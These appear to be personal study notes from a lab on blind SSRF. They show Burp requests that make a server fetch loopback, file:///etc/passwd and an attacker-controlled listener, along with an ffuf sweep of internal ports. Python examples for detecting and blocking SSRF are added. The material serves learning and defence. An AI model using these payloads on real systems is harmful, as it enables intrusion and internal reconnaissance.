BLIND SSRF
in a blind SSRF, the response shown to the user does not contain the body of the coerced request's response; at most it shows an error. to verify whether there really is an SSRF vulnerability, re-run the coerced request against a host you control and catch the server's outgoing request with Netcat.
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
input field: submit the expected user input
BURP > Proxy > Intercept > Raw
Request
...
POST /index.php HTTP/1.1
content-type: application/x-www-form-urlencoded
dateserver=http://dateserver.htb/availability.php&date=2024-01-01
BURP > Proxy > Intercept > Raw > right-click > Send to Repeater
Request
...
POST /index.php HTTP/1.1
content-type: application/x-www-form-urlencoded
dateserver=http://127.0.0.1/index.php&date=2024-01-02
- SSRF can be validated if the URL can be changed to point to another URL;
if the response reports no error, then there is an SSRF vulnerability
- changing the default URL in the dateserver parameter to http://127.0.0.1/index.php
will test whether the web application responds w/o error
- this method also shows whether the SSRF is blind (no body of the coerced response is returned) or not
Response
...
Date is unavailable. Choose a different date!
#verifying blind SSRF with Netcat
root@oco:~$ nc -nlvp 8080
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
input field: submit the expected user input
BURP > Proxy > Intercept > Raw
Request
...
POST /index.php HTTP/1.1
content-type: application/x-www-form-urlencoded
dateserver=http://dateserver.htb/availability.php&date=2024-01-01
BURP > Proxy > Intercept > Raw > right-click > Send to Repeater
Request
...
POST /index.php HTTP/1.1
content-type: application/x-www-form-urlencoded
dateserver=http://{attackerIP:port}&date=2024-01-02
- SSRF can be validated if the URL can be changed to point to another URL;
if the coerced request arrives at the listener, then there is an SSRF vulnerability
- changing the default URL in the dateserver parameter to http://{attackerIP:port}
makes the web application connect to the Netcat listener
- this method also confirms the SSRF is blind: the listener sees the request even though the web app's response shows nothing of it
#Netcat listener output
connect to {attackerIP} from (UNKNOWN) [172.17.0.2] 32928
GET /index.php HTTP/1.1
Host: 172.17.0.1:8000
Accept: */*
EXPLOITATION
exploiting blind SSRF depends on the web application's behavior: differences in its error messages leak whether the coerced request succeeded.
#open/close port enumeration
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
input field: submit the expected user input
BURP > Proxy > Intercept > Raw
Request
...
POST /index.php HTTP/1.1
content-type: application/x-www-form-urlencoded
dateserver=http://dateserver.htb/availability.php&date=2024-01-01
#identify closed ports
BURP > Proxy > Intercept > Raw > right-click > Send to Repeater
Request
...
POST /index.php HTTP/1.1
content-type: application/x-www-form-urlencoded
dateserver=http://127.0.0.1:81&date=2024-01-02
- the error msg returned for closed ports is later used as the ffuf filter to identify open ports
- "Something went wrong..."
- the error msgs for open and closed ports will be different
#identify open ports
BURP > Repeater
Request
...
POST /index.php HTTP/1.1
content-type: application/x-www-form-urlencoded
dateserver=http://127.0.0.1:80&date=2024-01-02
- change the port number to determine which ports are open
- the error msg returned for closed ports is later used as the ffuf filter to identify open ports
- "Date is unavailable. Choose a different date..."
- the error msgs for open and closed ports will be different
#AUTOMATED
root@oco:~$ seq 1 10000 > ports.txt
root@oco:~$ ffuf -w ./ports.txt -u http://{targetSite:port}/{targetPage}.{tld} -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "dateserver=http://127.0.0.1:FUZZ/&date=2024-01-01" -fr "Something went wrong"
* -fr means filter by regexp (drops every response matching the closed-port error)
80 [Status: 200, Size: 8285, Words: 2151, Lines: 158, Duration: 6095ms]
3306 [Status: 200, Size: 45, Words: 7, Lines: 1, Duration: 14ms]
8000 [Status: 200, Size: 37, Words: 1, Lines: 1, Duration: 51ms]
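Added example (not part of the notes or the module): the same port sweep seen from the defender's side, in Python. The log format and the sample lines are constructed; the detector groups the application's outbound fetches per client and flags a client whose fetches reach several distinct loopback/private ports, or a non-http scheme such as file://, inside one sliding window, which is the pattern the ffuf command above produces.

```python
import ipaddress
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit

# Constructed log format (assumption): the application records each outbound
# fetch it performs for a client as "<iso-timestamp> client=<ip> fetch=<url>".
LINE_RE = re.compile(r"^(\S+) client=(\S+) fetch=(\S+)", re.M)

# Constructed sample: one legitimate fetch, then the loopback port probes and
# the file:// probe from the notes, all from one client a few seconds apart.
SAMPLE_LOG = """\
2024-01-01T10:00:00Z client=10.0.0.7 fetch=http://dateserver.htb/availability.php
2024-01-01T10:00:05Z client=10.0.0.9 fetch=http://127.0.0.1:80/
2024-01-01T10:00:05Z client=10.0.0.9 fetch=http://127.0.0.1:81/
2024-01-01T10:00:06Z client=10.0.0.9 fetch=http://127.0.0.1:3306/
2024-01-01T10:00:09Z client=10.0.0.9 fetch=file:///etc/passwd
"""

def is_internal_target(parts):
    # non-http schemes never reach the upstream; a literal loopback/private
    # IP means the fetch was aimed at the server's own network
    if parts.scheme not in ("http", "https"):
        return True
    try:
        ip = ipaddress.ip_address(parts.hostname or "")
    except ValueError:
        return False  # a hostname, not an IP: leave to DNS/egress controls
    return ip.is_loopback or ip.is_private or ip.is_link_local

def detect_ssrf_probing(log, min_distinct=3, window=timedelta(seconds=60)):
    # {client: distinct internal ports/schemes} for every client whose
    # internal-target fetches reach min_distinct values inside one window
    events = defaultdict(list)
    for m in LINE_RE.finditer(log):
        ts = datetime.fromisoformat(m.group(1).replace("Z", "+00:00"))
        parts = urlsplit(m.group(3))
        if not is_internal_target(parts):
            continue
        key = (parts.port or (443 if parts.scheme == "https" else 80)
               if parts.scheme in ("http", "https") else parts.scheme)
        events[m.group(2)].append((ts, key))
    findings = {}
    for client, evs in events.items():
        evs.sort(key=lambda e: e[0])  # key only: ports and schemes don't compare
        for i, (t0, _) in enumerate(evs):
            keys = {k for t, k in evs[i:] if t - t0 <= window}
            if len(keys) >= min_distinct:
                findings[client] = sorted(keys, key=str)
                break
    return findings
```

Running `detect_ssrf_probing(SAMPLE_LOG)` flags only 10.0.0.9, with ports 80, 81, 3306 and the file scheme; the legitimate dateserver.htb fetch is ignored.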
#identifying existing files on the system
#again the error msgs will be different between existing and non-existing files
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
input field: submit the expected user input
BURP > Proxy > Intercept > Raw
Request
...
POST /index.php HTTP/1.1
content-type: application/x-www-form-urlencoded
dateserver=http://dateserver.htb/availability.php&date=2024-01-01
BURP > Proxy > Intercept > Raw > right-click > Send to Repeater
Request
...
POST /index.php HTTP/1.1
content-type: application/x-www-form-urlencoded
dateserver=file:///etc/passwd&date=2024-01-02
Response
...
Date is unavailable. Choose a different date
- this means that the file exists
BURP > Repeater
Request
...
POST /index.php HTTP/1.1
content-type: application/x-www-form-urlencoded
dateserver=file:///{nonExistentFile}&date=2024-01-02
Response
...
Something went wrong!
- this means that the file DOESN'T exist
#LFI via file://: URL-encoding the scheme to bypass URL restrictions or access controls
BURP > Repeater
Request
...
POST /index.php HTTP/1.1
content-type: application/x-www-form-urlencoded
dateserver=file%3A%2F%2F%2Fetc%2Fpasswd&date=2024-01-02
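Added example (not from the notes or the module): the check the dateserver fetch in these notes is missing, in Python. The allowlist, the dateserver.htb upstream, the allowed ports and the generic error text are assumptions; the function is given the form-decoded value (what the fetch would actually use, so the percent-encoded file:// above is judged as file://), rejects the file:// scheme, the 127.0.0.1 and {attackerIP} targets, the :81/:3306/:8000 probes and a name that resolves into the 172.17.x.x network, and returns one identical error for every rejection so the port and file oracle has nothing to distinguish.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Hypothetical policy for the page's "dateserver" parameter (assumption):
# the only upstream the app legitimately fetches availability from.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_HOSTS = {"dateserver.htb"}
ALLOWED_PORTS = {80, 443}
# One message for every rejection and every failed fetch, so the
# "Something went wrong" / "Date is unavailable" difference that the
# notes use as a port and file oracle disappears.
GENERIC_ERROR = "Could not retrieve availability"

def resolves_public(host, resolver=socket.gethostbyname):
    """True only if host resolves to a public, routable address; catches an
    allowlisted name being pointed at 127.0.0.1 or 172.17.x.x (rebinding)."""
    try:
        ip = ipaddress.ip_address(resolver(host))
    except (OSError, ValueError):
        return False
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_reserved or ip.is_multicast or ip.is_unspecified)

def validate_dateserver(value, resolver=socket.gethostbyname):
    """Return (ok, message) for the already form-decoded dateserver value."""
    parts = urlsplit(value)
    if parts.scheme not in ALLOWED_SCHEMES:          # file://, gopher://, ""
        return False, GENERIC_ERROR
    host = parts.hostname or ""
    if host not in ALLOWED_HOSTS:                    # 127.0.0.1, {attackerIP}
        return False, GENERIC_ERROR
    try:
        port = parts.port or (443 if parts.scheme == "https" else 80)
    except ValueError:                               # port outside 0-65535
        return False, GENERIC_ERROR
    if port not in ALLOWED_PORTS:                    # :81, :3306, :8000 probing
        return False, GENERIC_ERROR
    if not resolves_public(host, resolver):
        return False, GENERIC_ERROR
    return True, "ok"
```

The resolver is injected so the check can be exercised without DNS; in production the default socket.gethostbyname is used and the fetch should then connect to the resolved address rather than resolving the name a second time.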